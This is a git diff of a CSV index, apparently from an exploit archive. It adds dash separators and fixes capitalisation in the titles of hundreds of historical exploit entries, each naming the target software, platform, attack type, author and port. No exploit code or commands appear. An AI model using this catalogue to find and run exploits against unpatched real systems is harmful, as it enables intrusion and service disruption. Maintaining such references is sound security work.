diff --git a/files.csv b/files.csv index 9045798d3..ffc3ee371 100755 --- a/files.csv +++ b/files.csv @@ -35,7 +35,7 @@ id,file,description,date,author,platform,type,port 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 -37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 +37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0 
@@ -50,55 +50,55 @@ id,file,description,date,author,platform,type,port 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 -52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 +52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 -59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 +59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS 
Exploit",2003-07-21,Flashsky,windows,dos,0 -62,platforms/hardware/dos/62.sh,"Cisco IOS (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 +62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135 -65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 +65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 -69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 +69,platforms/windows/remote/69.c,"Microsoft Windows RPC - DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0 
74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 -75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 +75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 -77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 +77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 -79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0 +79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - SYSTEM Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 -83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 +83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 - FTP Gateway Remote 
Overflow Exploit",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 -90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 +90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel <= 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 -92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 +92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - DoS",2003-09-08,badpack3t,multiple,dos,80 -95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 +95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 
99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 -101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 +101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 
@@ -107,9 +107,9 @@ id,file,description,date,author,platform,type,port 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 -111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 +111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 -113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 +113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 
@@ -117,20 +117,20 @@ id,file,description,date,author,platform,type,port 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0 -121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 +121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 -123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 +123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) (1)",2003-12-02,"Christophe Devine",linux,local,0 -130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 
+130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 -135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 +135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 
@@ -149,17 +149,17 @@ id,file,description,date,author,platform,type,port 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 -155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 +155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 -163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,anonymous,windows,remote,0 -164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 +163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit 
(Windows)",2004-03-19,anonymous,windows,remote,0 +164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"WS_FTP Server <= 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 -166,platforms/windows/remote/166.pl,"eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 +166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0 
@@ -222,33 +222,33 @@ id,file,description,date,author,platform,type,port 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 -234,platforms/bsd/remote/234.c,"OpenBSD 2.6 - / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 -236,platforms/linux/dos/236.sh,"Redhat 6.1 - / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 +236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 -240,platforms/solaris/dos/240.sh,"Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 +240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPD <= 
1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 -247,platforms/solaris/local/247.c,"Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 +247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 -250,platforms/solaris/local/250.c,"Solaris 7 - / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 +250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 -256,platforms/solaris/local/256.c,"Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 +256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 
260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 -262,platforms/hardware/dos/262.pl,"Cisco Multiple Products Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 +262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 @@ -339,7 +339,7 @@ id,file,description,date,author,platform,type,port 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 -365,platforms/windows/dos/365.html,"Microsoft Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 +365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service Exploit (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 
@@ -509,7 +509,7 @@ id,file,description,date,author,platform,type,port 657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 -660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 +660,platforms/linux/remote/660.c,"PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0 
@@ -646,7 +646,7 @@ id,file,description,date,author,platform,type,port 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 -824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0 +824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit",2005-02-18,class101,windows,remote,21 
@@ -703,7 +703,7 @@ id,file,description,date,author,platform,type,port 880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0 -883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)",2005-04-24,cybertronic,windows,remote,2380 +883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2)",2005-04-24,cybertronic,windows,remote,2380 884,platforms/windows/local/884.cpp,"iSnooker <= 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 
